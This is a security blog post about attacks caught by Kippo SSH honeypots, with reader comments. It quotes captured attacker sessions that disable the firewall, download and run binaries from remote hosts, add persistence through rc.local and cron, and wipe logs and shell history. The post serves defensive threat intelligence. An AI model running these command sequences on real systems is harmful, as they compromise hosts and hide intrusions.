Lessons Learn from attacks on Kippo honeypots

Published: 2014-11-10
Last Updated: 2014-11-10 23:54:14 UTC
by Chris Mohan (Version: 1)
3 comment(s)

A number of my fellow Handlers have discussed Kippo [1], a SSH honeypot that can record adversarial behaviour, be it human or machine. Normal behaviour against my set of Kippo honeypots is randomly predictable; a mixture of known bad IP ranges, researchers or from behind TOR scanning and probing, would be attackers manually entering information from their jump boxes or home machines.

What caught my eye was a number of separate brute force attacks that succeeded and then manifested the same behaviour, all within a single day.Despite the IP addresses of the scans, the pickup file locations and the downloaded file names being different the captured scripts from the Kippo logs and, more importantly in this case, the hashes were identical for the two files [2] [3] that were retrieved and attempted to run on Kippo’s fake system

“So what?” you may ask. I like to draw lessons learnt from this type of honeypot interaction which help provide some tactical and operational intelligence that can be passed other teams to use. Don’t limit this type of information gather to just the security teams, for example our friends in audit and compliance need to know what common usernames and passwords are being used in these types of attacks to keep them current and well advised. A single line note on a daily report to the stakeholders for security may being in order if your organisation is running internet facing Linux systems with SSH running  port TCP 22 for awareness.

Here are some of the one I detailed that would be passed to the security team.

1)    The password 12345 isn’t very safe – who knew? (implied sarcasm)
2)     The adversary was a scripted session with no error checking (see the script’s actions below)
3)    The roughly two hours attacks from each unique IP address shows a lack of centralised command and control
4)    The malware dropped was being reported in VirusTotal a day before I submitted my copies, so this most likely is a relatively new set of scanning and attacks
5)    The target of the attack is to compromise Linux systems
6)    The adversary hosting file locations are on Windows systems based in China running HFS v2.3c 291 [4] – a free windows web server on port 8889 – which has a known Remote Command Execution flaw the owner should probably looked at updating….
7)    Running static or dynamic analysis of the captured Linux binaries provided a wealth of further indicators
8)    The IP addresses of the scanning and host servers
9)    And a nice list of usernames and passwords to be added to the never, ever use these of anything (root/root, root/password, admin/admin etc)

I’d normally offer up any captured binaries for further analysis, if the teams had the capacity to do this or dump them through an automated sandbox like Cuckoo [5] to pick out the more obvious indicators of compromise or further pieces of information to research (especially hard coded commands, IP addresses, domain names etc) 

If you have any other comments on how to make honeypots' collections relevant, please drop me a line! 

Chris Mohan --- Internet Storm Center Handler on Duty

Recorded commands by Kippo 
service iptables stop
wget hxxp://x.x.x.x:8889/badfile1
chmod u+x badfile1
./ badfile1 &
cd /tmp
tmp# wget hxxp://x.x.x.x:8889/badfile2
chmod u+x badfile2
./ badfile2 &
bash: ./ badfile2: command not found
/tmp# cd /tmp
/tmp# echo "cd  /root/">>/etc/rc.local
cd  /root/>>/etc/rc.local
/tmp# echo "./ badfile1&">>/etc/rc.local
./ badfile1&>>/etc/rc.local
/tmp# echo "./ badfile2&">>/etc/rc.local
./ux badfile2&>>/etc/rc.local
/tmp# echo "/etc/init.d/iptables stop">>/etc/rc.local
/etc/init.d/iptables stop>>/etc/rc.local


[1] Kippo is a medium interaction SSH honeypot designed to log brute force attacks and, most importantly, the entire shell interaction performed by the attacker.  https://github.com/desaster/kippo

[2] File hash 1 0601aa569d59175733db947f17919bb7 https://www.virustotal.com/en/file/22ec5b35a3b99b6d1562becb18505d7820cbcfeeb1a9882fb7fc4629f74fbd14/analysis/
[3] File hash 2 60ab24296bb0d9b7e1652d8bde24280b https://www.virustotal.com/en/file/f84ff1fb5cf8c0405dd6218bc9ed1d3562bf4f3e08fbe23f3982bfd4eb792f4d/analysis/ 

[4] http://sourceforge.net/projects/hfs/
[5] http://www.cuckoosandbox.org/

Keywords: kippo
3 comment(s)


I tested it on my machines. I don't have iptales service (I still have a firewall).
I have rigorous rules for firewall (but unfortunately outcoming traffic on 80/443 is allowed to all).
Password authentication is turned off (and sometimes is on only for nontrivial usernames).

I think that some simple rules can cut off ~97% of threats.
Hi Chris,

I have been seeing similar actions on my own Kippo honeypot (an example of the log below). From the little amount of analysis that i have performed on the files that the scripted attack attempted to pull to my kippo machine, it looks like it attempts to download and execute a malicious file exploiting a linux vulnerability. Not sure which one as i said havnt really looked into it enough.

md5sum of the files are below.

If you want more let me know and i can provide you with the logs that i have been collecting since early October. Ive also taken out the domain for privacy reasons but can provide it if you wish.

Kind Regards,

Daniel Parker

2014-11-11 05:18:01+0000 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,5792,] executing command "/etc/init.d/iptables stop
echo "nameserver" >> /etc/resolv.conf
echo "nameserver" >> /etc/resolv.conf
apt-get -y install wget
yum -y install wget
chmod 7777 / etc
killall -9 .IptabLes
killall -9 nfsd4
killall -9 profild.key
cd /etc;rm -rf dir fake.cfg
killall -9 nfsd
killall -9 DDosl
killall -9 lengchao32
killall -9 b26
killall -9 khelper
killall -9 Bill
killall -9 n26
killall -9 007
killall -9 codelove
killall -9 32
killall -9 m32
killall -9 m64
killall -9 64
killall -9 83BOT
killall -9 82BOT
killall -9 dos64
killall -9 dos32
killall -9 new6
killall -9 new4
killall -9 node24
killall -9 mimi
killall -9 nodeJR-1
killall -9 freeBSD
killall -9 ksapdd
killall -9 106
killall -9 09
killall -9 xsw
killall -9 syslogd
killall -9 skysapdd
killall -9 cupsddd
killall -9 ksapd
killall -9 atddd
killall -9 xfsdxd
killall -9 sfewfesfs
killall -9 gfhjrtfyhuf
killall -9 rewgtf3er4t
killall -9 fdsfsfvff
killall -9 smarvtd
killall -9 whitptabil
killall -9 gdmorpen
cd /etc;chattr -i 66
cd /root; chmod 7777 / etc
killall -9 minerd
killall -9 syn
killall -9 joudckfr
killall -9 www
killall -9 log
killall -9 .IptabLes
killall -9 .IptabLex
killall -9 .Mm2
killall -9 acpid
killall -9 m64
killall -9 ./QQ
killall -9 aabb
killall -9 g3
killall -9 S99local
killall -9 3
killall -9 pm
killall -9 qweasd
killall -9 tangtang
killall -9 imap-login
killall -9 xudp
killall -9 sshpa
killall -9 008
killall -9 txma
killall -9 mrdos64.b00
killall -9 mrdos32.b00
killall -9 kkpklp
killall -9 kiilp
killall -9 xin1
killall -9 jibateng
killall -9 syscore.sh
killall -9 syscore.sh
killall -9 syscore.sh
killall -9 .mimeo
killall -9 .mimeo
killall -9 .mimeo
killall -9 .mimeop
killall -9 .task1
killall -9 .mimeop
killall -9 .IptabLes
killall -9 .IptabLex
killall -9 .IptabLes
killall -9 .IptabLex
killall -9 .IptabLes
killall -9 .IptabLex
killall -9 .IptabLes
killall -9 .IptabLex
cd /root;rm -rf dir nohup.out
cd /etc;rm -rf dir fake.cfg
cd /etc;rm -rf dir cupsddd.*
cd /etc;rm -rf dir atddd.*
cd /etc;rm -rf dir ksapdd.*
cd /etc;rm -rf dir kysapdd.*
cd /etc;rm -rf dir sksapdd.*
cd /etc;rm -rf dir skysapdd.*
cd /etc;rm -rf dir xfsdxd.*
cd /etc;rm -rf dir fake.cfg
cd /etc;rm -rf dir cupsdd.*
cd /etc;rm -rf dir atdd.*
cd /etc;rm -rf dir ksapd.*
cd /etc;rm -rf dir kysapd.*
cd /etc;rm -rf dir sksapd.*
cd /etc;rm -rf dir skysapd.*
cd /etc;rm -rf dir xfsdx.*
cd /etc;rm -rf dir sfewfesfs
cd /etc;rm -rf dir gfhjrtfyhuf
cd /etc;rm -rf dir rewgtf3er4t
cd /etc;rm -rf dir fdsfsfvff
cd /etc;rm -rf dir smarvtd
cd /etc;rm -rf dir whitptabil
cd /etc;rm -rf dir gdmorpen
cd /etc;rm -rf dir sfewfesfs.*
cd /etc;rm -rf dir gfhjrtfyhuf.*
cd /etc;rm -rf dir rewgtf3er4t.*
cd /etc;rm -rf dir fdsfsfvff.*
cd /etc;rm -rf dir smarvtd.*
cd /etc;rm -rf dir whitptabil.*
cd /etc;rm -rf dir gdmorpen.*
cd /etc;rm -rf dir nhgbhhj.*
cd /tmp;rm -rf dir 1.*
cd /tmp;rm -rf dir 2.*
cd /tmp;rm -rf dir 3.*
cd /tmp;rm -rf dir 4.*
cd /tmp;rm -rf dir 5.*
cd /tmp;rm -rf dir jdhe
cd /tmp;rm -rf dir jdhe.*
cd /var/spool/cron; rm -rf dir root.*
cd /var/spool/cron; rm -rf dir root
cd /var/spool/cron/crontabs; rm -rf dir root.*
cd /var/spool/cron/crontabs; rm -rf dir root
cd /var/spool/cron ;wget -c http://www.xxxxxxx.com:9162/root
cd /var/spool/cron/crontabs ;wget -c http://www.xxxxxxx.com:9162/root
yes|mv /tmp/root /var/spool/cron
yes|mv /tmp/root /var/spool/cron/crontabs
cd /tmp;wget -c http://www.xxxxxxx.com:9162/jdhe
cd /etc;wget -c http://www.xxxxxxx.com:9162/sfewfesfs
cd /etc;wget -c http://www.xxxxxxx.com:9162/gfhjrtfyhuf
cd /etc;wget -c http://www.xxxxxxx.com:9162/rewgtf3er4t
cd /etc;wget -c http://www.xxxxxxx.com:9162/fdsfsfvff
cd /etc;wget -c http://www.xxxxxxx.com:9162/smarvtd
cd /etc;wget -c http://www.xxxxxxx.com:9162/whitptabil
cd /etc;wget -c http://www.xxxxxxx.com:9162/gdmorpen
cd /etc;wget -c http://www.xxxxxxx.com:9162/nhgbhhj
cd /etc;wget -c http://www.xxxxxxx.com:9162/byv832
cd /tmp;chmod 7777 jdhe
cd /etc;chmod 7777 nhgbhhj
cd /etc;chmod 7777 byv832
cd /etc;chmod 7777 sfewfesfs
cd /etc;chmod 7777 gfhjrtfyhuf
cd /etc;chmod 7777 rewgtf3er4t
cd /etc;chmod 7777 fdsfsfvff
cd /etc;chmod 7777 smarvtd
cd /etc;chmod 7777 whitptabil
cd /etc;chmod 7777 gdmorpen
cd /tmp;chmod 7777 nhgbhhj
cd /tmp;chmod 7777 byv832
cd /tmp;chmod 7777 sfewfesfs
cd /tmp;chmod 7777 gfhjrtfyhuf
cd /tmp;chmod 7777 rewgtf3er4t
cd /tmp;chmod 7777 fdsfsfvff
cd /tmp;chmod 7777 smarvtd
cd /tmp;chmod 7777 whitptabil
cd /tmp;chmod 7777 gdmorpen
cd /tmp;./jdhe
nohup /etc/sfewfesfs > /dev/null 2>&1&
nohup /etc/gfhjrtfyhuf > /dev/null 2>&1&
nohup /etc/rewgtf3er4t > /dev/null 2>&1&
nohup /etc/fdsfsfvff > /dev/null 2>&1&
nohup /etc/smarvtd > /dev/null 2>&1&
nohup /etc/whitptabil > /dev/null 2>&1&
nohup /etc/gdmorpen > /dev/null 2>&1&
nohup /etc/nhgbhhj > /dev/null 2>&1&
nohup /etc/byv832 > /dev/null 2>&1&
nohup /tmp/sfewfesfs > /dev/null 2>&1&
nohup /tmp/gfhjrtfyhuf > /dev/null 2>&1&
nohup /tmp/rewgtf3er4t > /dev/null 2>&1&
nohup /tmp/fdsfsfvff > /dev/null 2>&1&
nohup /tmp/smarvtd > /dev/null 2>&1&
nohup /tmp/whitptabil > /dev/null 2>&1&
nohup /tmp/gdmorpen > /dev/null 2>&1&
nohup /tmp/nhgbhhj > /dev/null 2>&1&
nohup /tmp/byv832 > /dev/null 2>&1&
echo "cd /tmp;./sfewfesfs" >> /etc/rc.local
echo "cd /tmp;./gfhjrtfyhuf" >> /etc/rc.local
echo "cd /tmp;./rewgtf3er4t" >> /etc/rc.local
echo "cd /tmp;./fdsfsfvff" >> /etc/rc.local
echo "cd /tmp;./smarvtd" >> /etc/rc.local
echo "cd /tmp;./whitptabil" >> /etc/rc.local
echo "cd /tmp;./gdmorpen" >> /etc/rc.local
echo "cd /etc;./sfewfesfs" >> /etc/rc.local
echo "cd /etc;./gfhjrtfyhuf" >> /etc/rc.local
echo "cd /etc;./rewgtf3er4t" >> /etc/rc.local
echo "cd /etc;./fdsfsfvff" >> /etc/rc.local
echo "cd /etc;./smarvtd" >> /etc/rc.local
echo "cd /etc;./whitptabil" >> /etc/rc.local
echo "cd /etc;./gdmorpen" >> /etc/rc.local
echo "unset MAILCHECK" >> /etc/profile
cd /etc;chattr +i sfewfesfs
rm -rf /root/.bash_history
touch /root/.bash_history
history -r
cd /var/log > dmesg
cd /var/log > auth.log
cd /var/log > alternatives.log
cd /var/log > boot.log
cd /var/log > btmp
cd /var/log > cron
cd /var/log > cups
cd /var/log > daemon.log
cd /var/log > dpkg.log
cd /var/log > faillog
cd /var/log > kern.log
cd /var/log > lastlog
cd /var/log > maillog
cd /var/log > user.log
cd /var/log > Xorg.x.log
cd /var/log > anaconda.log
cd /var/log > yum.log
cd /var/log > secure
cd /var/log > wtmp
cd /var/log > utmp
cd /var/log > messages
cd /var/log > spooler
cd /var/log > sudolog
cd /var/log > aculog
cd /var/log > access-log
cd /root > .bash_history
history -c"

a3e718751e600c4e8503ac6836b84aba kippo/dl/20141111002520__tmp_1
e62089b51f3b485b891359accdb11bdc kippo/dl/20141111002520__tmp_2
585be83c1ee0ad009379369717ba988c kippo/dl/20141111002522__tmp_3
9a501b92f3cf548ba13478f1b5855c68 kippo/dl/20141111002523__tmp_4
ff1e9d1fc459dd83333fd94dbe36229a kippo/dl/20141111002523__tmp_5
f7556d9ede5d988400b1edbb1a172634 kippo/dl/20141111002524__tmp_byv832
048016c6e6848f92a29296b72df4d2d8 kippo/dl/20141111002536__tmp_fdsfsfvff
9941a4dc930868a5739a8004de53a686 kippo/dl/20141111002548__tmp_gfhjrtfyhuf
18bcb1c192df95a4216946f0294135bf kippo/dl/20141111002558__tmp_rewgtf3er4t
090dae205e10bc21dad0a13cba11446d kippo/dl/20141111002614__tmp_root
8285f35183f0341b8dfe425b7348411d kippo/dl/20141111002618__tmp_sfewfesfs
9941a4dc930868a5739a8004de53a686 kippo/dl/20141111002643__tmp_smarvtd
This group is desciped quite heavily by MalwareMustDie (http://blog.malwaremustdie.org/)


Diary Archives